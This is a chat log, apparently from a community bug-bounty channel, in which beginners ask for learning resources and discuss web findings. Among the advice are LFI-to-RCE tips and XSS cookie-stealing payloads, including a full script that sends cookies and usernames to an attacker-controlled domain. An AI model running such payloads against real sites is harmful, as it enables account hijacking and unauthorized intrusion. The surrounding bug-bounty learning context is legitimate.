Well u need to look for ssh keys if u want to get RCE, and if u can't then report this bug (reading system files is no joke)
Any ideas where they are stored ?
Like in linux it's ~/.ssh/id_rsa
Can't seem to query %Appdata%
@wary moon hi, please keep video content for THM in #thm-community-media
Bugcrowd is dead
why do you think that?
Just because there is less transparency in handling of reports
Not rlly, a lot of people still use it
Use php wrappers (if the backend is php) in order to read backend php source code, from there you can find database creds.
Or if you are lucky enough then you can access the apache or any other service log and then try to inject any arbitrary code in user controlled input such as User-Agent, or any header
You can google how to escalate lfi to rce using log poisoning
hi guys
Hey
i want help in bugbounty
What help do you need
start a new journey in this field
I recommend checking out TryHackMe.com webpath and Portswigger academy
!docs bug-bounty
!docs levels
!docs verify
!docs bug-bounty
Those who r using bot commands here hope they read channel name correctly 
#bot-commands pls
My apologies... but it seems that there might be some problem with the site's certificate - keep getting this error: "Did Not Connect: Potential Security Issue"
#general message This message from #general is a good guideline from start to end 🙂
thanks
It's good even if you forget the fourth point 😄
Is there an easy way to fuzz parameters in a file containing URLs? So, if you have a text file with URLs containing parameters, is there an easy way to use that file to fuzz every parameter for each URL in that file?
Not too sure if there’s a tool that does it, but is a great scripting/programming challenge
Just do it in a bash for loop
Could even do that backgrounded for speed, technically. Not sure how many URLs you're looking at
Thanks @hybrid orchid! Yeah, so I have been playing with it and figured this out:
sed -r '/^\=/!s/=.*$/=somevalue/g' file-containing-urls.txt
This is working, however, it's only replacing the first = and not all =
Gave +1 Rep to @hybrid orchid
Or, in other words, only the last parameter and not any of the other parameters. Thanks again, @hybrid orchid
My problem with the for loop is the same problem I'm having. I can't replace all characters after every =. Eh, I'll keep stabbing away at it
is it normal if i can see media of website in admin/uploaded/images ??
i can access staff images and resumes
If it’s sensitive data, such as emails, names, age, etc. Then no that’s probably not normal.
Can anyone suggest to me how to access a website's dbs
Because when I try to use sql on a website it shows xss protection 1; mode=block
And messed up how to bypass this
Hello, can someone please guide me to get into Bug Hunting? Thank you in advance!
Check pins of this channel, learn javascript, sql, do THM web app path then portswigger, hacker101 ctfs, read bug reports and try hunting for bugs.
Thank you, already started with THM.
Gave +1 Rep to @past hatch
I am trying to deploy the owasp juice shop room's machine but it says I already have a machine running in this room, please terminate it... but there is no option to terminate it... what should I do
Guys, anyone here who wants to do bug bounty in collaboration? Anyone interested
@remote wadi a double bug bounty?
Together
let's go
Dm me
lets do it
Hey @lament adder let’s keep it English please
Hey
is there anyone who wants to team up for bug bounty can dm me
@knotty timber me I guess 🤔
Yeah
Yes
If anyone is willing can i join .? I'm new to bug bounty and just wanna know the parcs !
pracs*
Any bug bounty hunters are alive
I mean ping me
maybe ask the question
I meant ask here not dm me lol read #rules :)
@untold scroll
Can you please show me one of your work. so that i can understand just for clarity
What it looks like
I haven't disclosed any of my reports but in case u need this might help u https://github.com/devanshbatham/Awesome-Bugbounty-Writeups
Ohhkk
Thank you so much
I am preparing a mindmap, can anyone help me with this
#infosec-general maybe ask there
Ok
i need to learn to code
#programming probably be a better place to ask
Is anyone willing to teach a guy with a basic knowledge of webapp pentesting about bug hunting?
Ps: that guy is me.
Tryhackme can, #start-here
@feral bronze ^
Thank You @past hatch. I am already onto it. And completing rooms in it for the past 50 days.
Gave +1 Rep to @past hatch
click that link
Portswigger academy also can
Hi chat
I found algolia App_Secret_Key , App_ID, App_Index_name and some other configuration leaked on GitHub repo ( the repo belongs to dev works on the company)
Should I report it?
Well app_secret_key is something here, see if there is any more sensitive info u can get which shouldn't be available, and if u do find it then submit the report.
BugBountyHunting.com gathers bug bounty hunting writeups and content to help you access them quickly, and also save the results for research or, later use.
Big vouch for that platform
@past hatch Thx man
I found Algolia API key and I submit it
Gave +1 Rep to @past hatch
Gl with bounty
Still no response from the triage team
Just I am waiting
Also I checked the Keyhacks repo I found the Algolia API key with the exploit
So I reported it and now I am waiting
Well, first response totally depends on that program. For some it may be 24hr, for some even 3 days.
@past hatch yeah I know hope it triaged soon and be valid one 💥
-clean 100 633772744483274793
clean 100 633772744483274793
Worth a shot 🤷♂️
I found a site (that I'm a user of) that sends password resets in plain text via email. Seems like that's a bad idea....
hi
Love new members though we do, you don't have to say that in every chat :)
hello
anyone know how i can get into bug bounty like where to start and what tools and how to use them
bug bounty is mainly web app testing, so focus on learning and understanding the owasp top 10 (https://owasp.org/www-project-top-ten/), portswigger academy (https://portswigger.net/web-security) has some really good labs for learning this, though assumes you have burp pro. This can be circumvented by using ZAP I believe.
I'd also strongly recommend you check out the OWASP Web Security Testing Guide (https://owasp.org/www-project-web-security-testing-guide/). Though this is more aimed at web application pentesting, it holds some real treasures to improve on bug bounty.
Once you have an understanding of those check out hackerone hacktivity as they have a massive amount of disclosed bugs that people found in the wild and is an incredible resource to learn. They also have a CTF platform with some really great and realistic challenges
TLDR breakdown for those who may see this after you:
Tools:
- Burp Suite Community / Pro (Don't sweat if you don't have pro)
- FFUF/ Any fuzzing tool (This can be used to fuzz for extensions for loose files on a server)
- Zap (If not using burp)
Practice Sites:
- Portswigger Academy (https://portswigger.net/web-security)
- THM OWASP top 10 (https://tryhackme.com/room/owasptop10)
- OWASP WSTG (https://owasp.org/www-project-web-security-testing-guide/)
- THM OWASP Juice Shop (https://tryhackme.com/room/owaspjuiceshop)
- Hackerone Hacktivity (https://hackerone.com/hacktivity)
- Hacker101 Training CTF (https://ctf.hacker101.com/)
Closing out, don't go into bug bounty expecting instant results! It takes an insane amount of time to get your first bounty but it will eventually happen. Go into it to learn and I promise you'll learn more than some CTFs
@native token thank you, ill look at them as soon as possible
Gave +1 Rep to @native token
req for pin
Will create a more indepth post as there's a bunch I could add to that post as well
I was pentesting a website and I noticed something, changing the host header to for ex: bing.com reflects in the source code of the website... In base href and in many other lines too... But it does not seem to redirect to bing... Any idea what I can do??
I tried adding some other headers too... But it gives an error
hZJhSwEIb/Ssn3NW1XpwvbYG4VBiqGmyTmrtO56/32jmZXxQC/PED9tVw/O7WI6 does anyone know what kind of encryption this is?
like, it has multiple slashes in it, I see it often in some websites
the host header is telling burp where to fire at
so if you're accessing
/testdirectory
host: google.com
it's gunna go to google.com/testdirectory
if you change host it will change the host
I'd probably guess going off of what you've put that changing the host header isn't really gunna do much in this instance unless you can get some sort of injection vuln going e.g xss
But even then it's only a self-xss unless it persists in some sort of logs
Tbh most header attacks r useless bz of high user interaction and no security impact. Well, if u can get the password link on ur controlled domain (by modifying the host header) using the forgot password functionality, that will lead to full account takeover, which is a special case
I see, thanks for the information @past hatch @native token ...i think i know what i need to do
Gave +1 Rep to @past hatch
How to start bug bounty
Anyone can please tell me. I am new in this field
There are some great resources in the pins and if you scroll up a bit you will see Optional mentioned a good way to get into them
Hey guys, any ideas on how to escalate an open Redirect ?
There's this website vuln.com/?page=http://bad.com
This opens bad.com
I tried javascript://alert(1) to pop an xss
But didn't work
Any ideas ?
It's a Django website though
You could try xss via data:// tags
a lot of open redirects tend to be different from each other depending on the implementation, so it's best to fiddle around and see if you can find any variation that may work for your case
How to find the ip address of the google meeting in which we are connected
@prime cipher ^ was spammed across multiple channels
Hello guys, I'm a newbie learner. Trying to figure out how things work in bug bounty. I have a question, I was trying to find xss in a site. I achieved to pop up an alert on the screen. But it happened when I edited the "response of the request in burp suite". I guess this is not a xss vulnerability. Is there anything that can be evaluated as a security leak? Is it possible to create a risk just by editing the response of requests?
If you are editing responses you get from the website, it's not an issue with the website.
In ur case it's considered self xss which ain't worth reporting. Yes, editing the response can help, like bypassing 2FAs, bypassing client side restrictions or logic flaws.
@past hatch Thank you for the answer.
Gave +1 Rep to @past hatch
Use dnsmap from Kali Linux
Open a terminal And type:
dnsmap google.com
And u get all IPs of Google, try it
Anyone a real bug bounty hunter that would like to take me under their wing? Warning - i will be asking you the most basic fundamentals that might be the most annoying to you. Thank you in advance. Appreciate this much
The basic fundamentals can be found with research, also bug bounty can be competitive can be hard to find a mentor that will take you under their wing
I mean there may be someone but I think a lot will say learn by yourself, there's a great site that's realistic that's made by one of the THM staff Adamtlangley
I see what you're saying
BugBountyHunter is a platform created by zseano designed to help you learn all about web application vulnerabilities and how get involved in bug bounties & begin participating from the comfort of your own home.
Oh man ! that 's awesome !!!
That site is probably the best place to learn the types of vulns you'll find
Optional I actually emailed zseano before and they aren't accepting any more members 😦
Meant to be reopening soon™️
Thank uu
One thing you'll need to work on though is understanding the basics before you consider bug bounty.
gunna drop this back down here as it's quite useful especially for the OWASP stuff
Love it! Love how you said "we will eventually find a bug" XD that gives me motive man thank you
Okay let's get this show on the road XD
I want to hack this website https://hackerone.com/sifchain?type=team
You'd be hard pushed considering that's a source code review program
Have you done any of the hacker101 CTF yet?
The Hacker101 CTF is a game designed to let you learn to hack in a safe, rewarding environment. Hacker101 is a free educational site for hackers, run by HackerOne.
I did get started on the cv2 ones
You can do challenges on here that are based on realistic vulns and gain private invites every 26 points
Are you freaking kidding me !!! I thought i was hallucinating
Note that if you receive a private invite and you don't like the look of the scope, you can skip it 3 times as long as you remember to fill out the questionnaire that they attach to the skip button
I was planning to stick with hacker1 at first but then i thought it was a bit too hard and saw that THM was a much better platform for learning but I also really like hacker1.
THM is a much better way into it
I'll be sure to keep this in mind
going from 0 knowledge straight into bounty is a sure way to never find a bug 😂
Invites also only go out once a day. That being 8am GMT roughly
So question : can i start to apply what i learned from Juice shop and OWASP rooms here on real life bug bounties ??
Yup pretty much
No freaking way!!!!!
the most common bugs you'll find during bug bounty are OWASP top 10
THAT IS AMAZNG
Though they won't be as easy to find as the ones in those boxes
Dude that still gives me so much motive !!
If you learn well from videos, I can't recommend enough InsiderPHD (https://www.youtube.com/user/RapidBug). Even now I go back to her videos to check on stuff I've done a few times
that's why I'm finishing up the 'Complete Beginners Path'. I was gonna go into Hack The Box next but I think Hacker1 is my next bet.
Don't write off any platform
Ahhh yes i know of 🙂
Ohhh that makes complete sense .
The main problem a lot of people have when going from THM/HTB is they go into a platform thinking it's got a vuln
I see
which is a blessing and a curse, as on one hand you'll look at things from every possible angle until you find something. But if you don't find something it can be brutal on mental health and just cause you to doubt yourself
Just like John Hammond said...it's more of a way to go and lift weights 🤪
see how much you can lift lol
as opposed to hacker1, which is the real big boy
There's an insane difference between prod systems that have had pentests and ctf boxes that's for sure
mainly as you're playing a treasure hunt with the pentesting team in the hope they missed something
Well just the fact that you said that i can start to apply what i've learned from THM OWASP rooms and similar sort gives me so much hope
But i get what you're saying,, i can't write any platforms off and learn everywhere i can
I'm excited already XDD
Exactly, going off of experience. as a beginner/middle ground user, you'll always learn more from thm/htb as they are designed to teach
shits crazy man
Agreed !
bb is kinda that place you go when you decide you hate yourself and want to suffer for a few hours
So let's say i want to have at it with exodus.com a crypto currency website
do I just read what's in scope and start hackin away ?
Obviously do my recon first
and OSINT
Essentially read and understand the program page so everything
then start enumerating
ok on it !!!
Like exodus asks you to add your hackerone username to your user agent
PS. i have a list of IOU's --- i added your name on it XD
Niiice !
mate don't worry about it, I'm always open to helping people get into bounties, though I'm not some bb god like naham or zseano I like to help
essentially you'd have all your web requests running through burp or zap and have an option adding it to the header
This i would need Burp Pro for it no?
lemme check I don't think so
okay thank u mate lemme do some researching and get in this rabbit hole a bit deeper. 😊
Appreciate u
+rep @native token
Gave +1 Rep to @native token
@fallen palm You'll wanna have a rule like this
Here's what it should look like inside the ruleset, note it won't work unless you set Regex match
Ohhhhhh is that so hackerone and graphql can log your ip and username to know who is sending requesting etc.???
oh no I was just on the hackerone website so reloaded the page to show how the match/replace rule would take effect
What I'd imagine is exodus have some sort of logging that checks user-agents to determine whether they are actually being attacked or if it's a bounty researcher
I basically have to read out User-Agent: h1 - roki
Yea
so go into Proxy -> options -> scroll down to match and replace
click on add
Then you want these settings
Type: Request header
Match: ^User-Agent.*$
Replace: User-Agent: h1 - <your hackerone username>
[/] Regex match
That basically says that every request that goes through burp, will replace the user agent with whatever you specify in replace
Like this
After you can click ok and check the enable button
Mannnn this is so fuxkin awesome !!!! My blood is pumping man XDDD
I appreciate you taking your time for this
setting up burp suite now
Once i commit to these changes/settings do i need to set back as default or can i jjust leave
Once you enable them, you should always have your web traffic going through burp even if you have intercept off. While testing Exodus don't turn off that rule
once you're done with exodus you can just uncheck the box under the enable column until you decide to test it again 🙂
Couldn't agree more 
Match and replace always helps when looking for CSRF tokens😄
Her video on IDOR are quite nice😄
I have one question. How am İ start to bug bounty ?
Learn web hacking
That is the first place to start, there are a bunch of resources in the pins
ohhh I got it . Thanks a lot for help (=
@fallen palm
Can we have this message pinned?
Thanks @lavish hollow
Gave +1 Rep to @lavish hollow
Alright so, I found HTML Injection, but I cannot increase it to LFI. I tried various methods and ways. Spent 3-4 hours. Got nothing. Tried <iframe> and other stuff, but no progress.
Anyone who has some knowledge regarding this?
Also, make sure to mention me while answering. Thanks!
Html injection rarely becomes lfi unless it’s being rendered by the server and is chained with ssrf.
You’ll want to look at img with event handlers such as onerror, essentially any html object that has handlers
I tried something like <img src=x onerror=this.src='http://<ip>/?c='+document.cookie>, and I do get the request back.
Tried some other XSS payload, everything seems to work except the LFI payloads (not familiar with them).
Just do onerror=“alert(document.cookie)”
If you’re getting a response, you’ve got xss, alerts with location or cookies tend to be the best and most effective way of getting it to work
I was thinking if I could request the .js file hosted on my localhost and that .js would contain some php code that I want to execute, like phpinfo(); I am not sure.
I do get a pop-up, but empty string.
That means all cookies are set with httponly or the secure tag
Change to document.location
Also pulling a js file with php inside wouldn’t work, or at least I’ve never seen that work
I also tried document.domain and it successfully gives back the domain name.
That’s enough to prove xss on any bug bounty platform
Context helps, if it’s stored. What user privileges do you have and can it be triggered by other users and/or higher privilege users
If you can cause stored xss via low privilege user that can target a high priv user that’s an instant high
It's a reflected one with low privileged user. Also, I can get the admin account just by registering a new account and filling up nothing.
This web server is messed up.
Ah reflected you’ll be lucky to get low unless you can chain it
I’d start looking for stuff like csrf to try and up impact but seeing that they set all cookies in line with best practice, I doubt you’ll be able to hit any sensitive endpoints eg change password
I don't know how you concluded this.
What should I search for on google to know about this?
I hope you can get my question.
You have reflected xss
Start looking for ways to chain it to improve impact
Is it reflected via url, if so that’s better
Yea, via URL.
If it’s reflected via an input field, that’s self xss and informational
Ah that’s good at least
Yea start Googling for reflected xss impact etc
Try to find vulnerabilities you can use to increase impact, for example, you can use reflected xss via url to hit the change password endpoint and you get an account takeover, which is a high impact, instead of the poor impact from reflected xss
Think of it like a cog to get a bigger vulnerability to work
Gave +1 Rep to @native token
No problem, good luck!
Usually filter bypasses like that come down to a lot of trial and error
Well here's a few u could try in mentioning impact try converting it into stored xss if not then reflected also u can mention open redirect possibility and check for SSTI also.
I would say XSS could be possible. Try some payloads from the PortSwigger XSS cheat sheet, PayloadsAllTheThings, or on Twitter #bugbounty xss, understand how the app reacts to those inputted payloads, and then bypass it.
hey
nvm
document.body.innerHTML += ('<script>
var toTest = ["user-block__title", "astra-menu-user-username", "PLACE USERNAME CLASS/IDS HERE"];
document.addEventListener("DOMContentLoaded", function(){
var username = "not found";
toTest.forEach((item) => {
var test = document.getElementById(item);
if(test == null)
test = document.getElementsByClassName(item);
if(test != null)
{
username = test;
}
})
document.body.innerHTML += ("<img src=https://.your domain/kkk?xssCookies=" + escape(document.cookie) + "&xssUsername=" + username + "/>");
window.location.href = "/";
});
</script>')
and wrap it inside
<noscript>
<p title="</noscript><img src=x onerror='put it here'>">132</p>
</noscript>
So, in your server you will get data like this: https://imgur.com/a/gIfwuHA
This is just a script I made yesterday to report a bug to the website owner, otherwise they would have said there is nothing you can do with XSS
@fallen palm
also, you can't get the data back from the server
because of CORS
you can bypass it tho with the img tag, then read the IMG info
Thanks for the info!
Hello, I am doing a bug bounty on another website.
I managed to get the real IP behind Cloudflare.
But doing the same request on the real IP results in a 404.
When logging in on the website, it goes to a "staging-domain.com", basically it's a non-live version of their site I am guessing?
Hey, I was going through a VDP (basically this program won't pay you anything) in H1, it only has 7 resolved reports... Anyone up for collab?
Also, is this vulnerable to subdomain takeover?
Also, I got another http://b2run.xyz.com/ (same domain as the first one)
Which shows exactly the same thing
Unfortunately we do not know this domain. If it belongs to you, you can connect the domain to your Uberspace as described in the wiki.
Lol, check the CNAME of that domain first: dig CNAME domain.com
I am trying for online
Because I am unable to open my Kali
And I am getting this
xyz.com does not have a CNAME record.
You wouldn't know that if you weren't messing with it smhhh
The bug bounty programme clearly states what's in-scope
If it's not, leave it
Ok vulnerable team. :))
wut
ayo no need to be like that @fallen palm. That's the type of attitude that gives bug hunters a shitty name
Does amazon s3 bucket have any other url ?
man I'm trying to make the platform a safer place but no need to extend it if they ignore
Surely you should have checked the scope first, to make sure you weren't breaking the law?
thanks
and in any instance bug bounty is always limited by scope, regardless of the platform
thanks for all I will consider
Hey friends
After completing port swiggers labs what should my next step...for bug bounty
Hunting
have you enrolled in any path?
If u feel u need more practice on some topic then do PentesterLab, else start working on methodology, read bug reports and writeups, apply what u learnt on targets.
Try Paths like Web Fundamentals or Web Hacking Fundamentals Module. @lyric barn
https://tryhackme.com/path-action/web/join
@fallen palm yesterday I enrolled Web Hacking Fundamentals an
And @past hatch dude I have enrolled the Complete Beginner and Web Hacking paths on THM
Should I study the web hacker101 book for report writing?
first complete the paths then try reading
Yeah it's good, u can also try HackerOne Hacktivity, https://pentester.land/list-of-bug-bounty-writeups.html
That's a good start, as you will get experience while solving web based ctfs.
you'll learn common vulnerabilities
Oh... Thanks dude....
a
thanks
|_dns-recursion: Recursion appers to be enabled
I get this from a DNS server scan. Can I exploit it?
Thanks Bro
Gave +1 Rep to @past hatch
Ima fire a question.
You find user enumeration on a site due to it not validating whether an authenticity token has been used or not. What do you do?
Fire up Burp Suite and create your own token and send the request?
Start looking for IDORs: create 2 accounts and try to access user1's data from the user2 account.
hey guys
